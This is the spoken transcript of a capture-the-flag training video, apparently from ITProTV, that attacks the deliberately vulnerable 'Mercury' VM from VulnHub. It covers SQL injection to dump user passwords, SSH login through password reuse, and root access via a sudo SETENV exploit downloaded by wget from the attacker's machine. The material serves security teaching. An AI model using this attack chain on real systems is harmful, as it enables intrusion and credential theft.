Hands-on Hacking Demo | CTF - Capture the Flag in 15 Minutes!

Captions
With so many red team security certifications focusing on hands-on practical skills anymore, I figured it was a good idea to create a series on ITProTV that would address that. I call it Hands-on Hacking, and you know what, I wanted to give you a little taste of what that actually looks like, coming up next.

All right, so the first thing I did was I downloaded a vulnerable virtual machine from vulnhub.com. Don't worry, the link for that will be in the description below. This one is called Mercury. It's a very straightforward CTF, and so I thought it was perfect for us to get our feet wet on what it looks like for us to do this hands-on hacking series, build our methodology, and use those hacking skills that we're learning to some avail, right? So the first thing I did was I ran an nmap scan to check for ports. Now I've pre-gamed a bit of this to save some time, but you will be able to see the actual commands that I use. So let's start off with this file right here, nmap_all_ports. This was my scan of every port of the machine, looking for openings, right? So if I cat nmap_all_ports like that, you'll see that all I found open was port 22 and port 8080.

From there I decided to drill down a little bit deeper, to get some versioning information, things of that nature. So I've got another file right here that I called deep_scan. Let's cat that, nmap_deep_scan, and there you see we get a bit more information showing us what's going on here, and there's a lot of really good information here. Obviously we have SSH open; that's not very uncommon for what seems to be a web application running on this server. We can see that this server is running on port 8080 and not the typical 80 for a web service. It's running WSGIServer and CPython 3.8.2, which makes me think that if we're running Python like that, it could be a Python Flask or Django kind of thing going on, and that's the kind of stuff that comes from just experience. So as I look through here and I kind of see what is going on, I'm getting some information back from the nmap scan itself and the probes that it sent. Some interesting stuff that I see right out of the gate is right there: I see we've got a robots.txt file with one disallowed entry. That's good, something I want to make a note of if I were doing this in maybe a testing environment, right? That's always good information. And just kind of scrolling through here, I see that this site doesn't have a title, one unrecognized service. Okay, so not a ton. We know that we've got at least one robots.txt entry, so that's good for us to know. The other file that I have here is nikto.txt, which I created by running the nikto utility. Let me roll back up here really quickly, because I did want to show you: there's the nmap scan that I ran for this. Right there you can see that: -A -T4 -n -Pn -p. Lots of good dashes going on there, but all those do something interesting, and we talk more about that in depth in the actual series itself. Okay, so let's move on here. Let's take a look at that nikto scan, so cat nikto, and we see not a whole lot happening there except for this one: GET /silverstream. All right, so that's something I would also want to make a note of. It says it's allowing directory listing. I always like to get good directory listing; you never know what kind of good files you'll find that the web server is just dishing out for you, and it could be interesting stuff. So those are two big notes I'm going to make right now. I would also normally run gobuster, dirb, DirBuster, something like that, directory fuzzing. I did that; it was completely fruitless, it gave us nothing, so I don't want to waste our time with doing that here with limited time.

All right, now that we know that we've got our web server running on port 8080, we've got the port, or the IP it is that it's on (I just did a ping sweep to figure out what that was), and I've got a couple of interesting things: I've got a robots.txt and a silverstream business. Let's jump into a web browser and see what we find. All right, so let's put that in there. It's going to be 10.10.10.4. I'll zoom in so you can see where I'm typing, just in the address box here, and it's going to be on port 8080, and I'll hit go. Okay, so we see "Hello, this site is currently in development, please check back later." Not a problem. We know we've got at least one asset, which is robots.txt, and we can see it's just showing disallow on the root of the thing, so we're probably actually getting a redirection. I could check that in Burp Suite to see if that's actually happening, but nothing really helpful from robots.txt. What was the other thing we had? What was it, silverstream, I think it was. I'll give it a whirl, see if I can remember it off the top of my head. Let's see here, I think it was silverstream, like that, hit enter, and oh man, we're getting some "page not found," and you can see here it says Django tried these URL patterns in this order. We see this is the first one it tried, the name equals... I'm going to give it a file name. We've got robots.txt and we've got this one, mercuryfacts. This is leaking sensitive information. You can see why that's happening: you're seeing this error because DEBUG = True. So that's a big naughty on the OWASP Top 10 list right there, that you're leaking that sensitive information.

So now that I know that mercuryfacts is probably a good directory, I'm going to copy that and then just slap it on up in here and paste. All right, hit enter, and we do get a picture of Mercury. Excellent. That's interesting, right? That looks like the moon, but maybe it's Mercury. It's pretty awesome. And Mercury Facts: we've got "load to see a fact" and we've got this to-do list. Start there; let's check out the to-do list. "Add CSS," obviously it's not styled very well. "Implement authentication using the users table," ah, that's something I want to keep my eye on. "Use models in Django instead of direct MySQL calls." So now I've learned a little bit more. I learned that they're using a users table that's in a MySQL database. We also saw some of that information back in our previous 404 error, at least I think I did. But if that is the case, that means that there's probably a SQL injection to be found in this lovely little CTF. So let's go back, let's take a look at these Mercury facts. I always want to cover all our bases. It does say fact ID 1: Mercury does not have any moons or rings. And if you look up in the URL, you've got mercuryfacts and then forward slash 1. Well, what if I change this to 2? You'll see that it changes the fact ID to 2: Mercury is the smallest planet. I could probably do 3 and so forth, but what I'm seeing here is this might be where I could perform SQL injection. So I'm just going to try to test that by adding a single quotation mark, like so, and hitting enter, and you'll notice I am now definitely getting a SQL error: "You have an error in your SQL syntax," telling me where, giving me all sorts of really interesting information. If you scroll through this page, it is extremely verbose, lots of really interesting information here, but at least I know right now that we do have SQL injection and I can start trying my SQL injection techniques to get farther.

All right, so if that's the case, I want to check how many columns there are, so I'm going to do an ORDER BY. I'll try 1, and I'll use the octothorpe, the hashtag, to see if I can't use that as an inline comment to stop the rest of the SQL. All right, so that works, so that means there's at least one column. Let's try 2. I'm looking for it to break. All right, so there's only one column for us to use. That's good to know. All right, let's go back. So now that we know we have one column, we can ditch this ORDER BY; we can use a UNION SELECT statement like that. Let me get my mouse out of the way for you. And what I'm going to do is, I have that one column, I just want to start throwing some SQL at it. I could use, like, what's the user? Grab that, like what user is running the database itself, and then just throw that on the end, and you can see right there it kicked that back to me: dbmaster@localhost. Okay, so my SQL injections are working great. I'm on my way to cracking this database. So let's look into the database a bit. What I'm going to do is try to get the table name, so table_name, and that's going to be from information_schema (i-n-f-o-r-m-a-t-i-o-n underscore s-c-h-e-m-a, I can never spell these things, let me move over a bit), information_schema.tables. Don't forget my comment. Let's see if that works. Perfect. So now it's dumping all the table names for me to see, and I do see, as we recall, there is a users table that we saw back in those notes, that to-do list, right? Excellent. So let's enumerate the columns for that table. Get back in our URL here, kind of just pull some of this out. We're going to remove table_name and we're going to change that to column_name from information_schema.columns from table_name equals users, and then octothorpe that. All right, so I've got a bit of a problem. I probably just misspelled something: union select column_name from information_schema.columns from table_name equals users. That seems to be right, but I'm sure it's just a syntax error, because that's what it's telling me it is, a syntax error. All right, let's go back, let's play around with this a little bit: select column_name from information_schema.columns from table_name... oh, that's the problem, it's not FROM, it's WHERE. That's what's going to help me out there. Look at that, things work really well when you do that. Okay, now we see we've got id, password and username. Okay, so some really good columns. I only have one that I can output, so I'm going to have to do these one at a time. I think we'll start with username, then go to password; that's probably what I want. All right, so now that I know that those are the actual columns, I can say union select, and I want username from, and the table name is users, comment that out, and there we go, there's a list of the users: john, laura, sam and webmaster. webmaster is probably the one I want to know about. And then I'll just go back in here and change it to passwords, I think it is just password, yep, it's password, and there's all their passwords: johnny1987, love my kids, love my beer (who doesn't?), and mercury is the size of 0.5056 Earths. I'm going to copy this, and now, since we haven't found any login, the only place I've seen where a username and password should work is on that SSH, right?

So let's go try this. We have webmaster and we've got webmaster's password. Let's see if there's any password reuse going on here. So I'm going to clear, I'm going to say ssh (not too many y's, not enough s's), and it was webmaster at, and I'll give the IP address, which is .4. All right, pop the password in there, and hey, we've got login. Excellent. So now we've got some shell access to this machine. Now let's do an ls. We've got a user flag there; we could read that. That's good for us, making some headway into this CTF. We have captured a flag. Let's go into that mercury projects list, cd into mercury_proj, do an ls, let's see, you've got this notes.txt that looks interesting. Let's cat that, and we see "project accounts (both restricted)." There's webmaster and then there's linuxmaster, which says "for Linux stuff," so linuxmaster is probably the administrative user for this system. Looks like the password is base64 encoded, so I'll just copy this, and then I will echo that, paste that out, and then pipe that into base64 with -d to decode it. We hit that, and there is what looks to be the decoded password. Let's copy this and then let's try to su as linuxmaster. This is the switch user. I'll paste the password in, and we can see that we have changed to linuxmaster. Excellent.

All right, let's go to linuxmaster's home, see if anything interesting is in there. Nothing. I could start looking at hidden files and things, but one of the things I like to do straight out of the bat when I get some access is do a sudo -l. It's going to ask for my password; paste that back in, and it tells me I can do SETENV for this user on bin/check_syslog.sh. Okay, so maybe there is a privilege escalation from sudo using that SETENV. What I'm going to do here is I'm going to just split my terminal here, I'll increase the font so we can actually see these things, and I'm going to do a searchsploit. searchsploit is Exploit-DB's local copy tool utility, so you can search for known exploits, and I'll just type in setenv. We see we get a couple of results. One's for Apache, which we're not running, right? We're running Python, not Apache, here. And we also see one for "sudo default SETENV local privilege escalation." It's exactly the kind of thing we're looking for, so I just need to copy that over. So let's do that. I will copy /usr/share/exploitdb/exploits/multiple/local/ and then it is 7129.sh, and I'll just call it exploit.sh, like that. For whatever reason, a lot of times I get some encoding issues, so I'm going to do a dos2unix command on the exploit itself, so it's converting it to a Unix format, because that's what we're working in. From there I should be able to dish this up using python -m Simple... oops, http.server, and I'll put it on port 80. This is on my local machine, so basically I'm just starting a really quick and dirty web server so that I can grab this with wget. All right, I believe my IP is .3, so I will do a wget http://10.10.10.3/exploit.sh. We see that the connection was made, the file was transferred. I do an ls, I see that exploit.sh is there. I can go ahead and kill this, and I'll exit out of there.

All right, we're making some headway. I'm going to do a chmod to make this executable, just add the +x, and it is exploit.sh, and then we should see it as green, and then we just fire it off, ./exploit.sh, and see what happens. Okay, so it says "please give me a program to run via sudo." Well, good news is it ran sudo -l for us and shows that we have one, so I'm going to grab that program, copy that, and then we'll rerun our exploit with that tacked onto the end, and we can see "congratulations, it's a root shell." I do an id: I am root. I can cd to /root, do an ls, there's the root flag right there. We have rooted this box from start to finish. Hopefully that helps you get an idea of what we're going to be doing in the Hands-on Hacking series, going from boot to root and figuring out a really good methodology as we work our way through multiple different types of boxes. So I hope you enjoyed this, and I hope to see you there.
Info
Channel: ITProTV
Views: 30,172
Keywords: ctf hacking demo, hands on hacking tutorial, hands-on hacking, hands on hacking, hacking demo, ctf hacking, capture the flag hacking, hacking demonstrations, how to learn hacking, hacking challenge, capture the flag, ethical hacking, hacking tutorial, exploit tutorial, how to hack, cybersecurity hacking, cybersecurity traning, hacking tutorial for beginners, hacking training course, ethical hacking training course, security training course
Id: 5gLA6fMqtZY
Length: 15min 59sec (959 seconds)
Published: Wed Oct 07 2020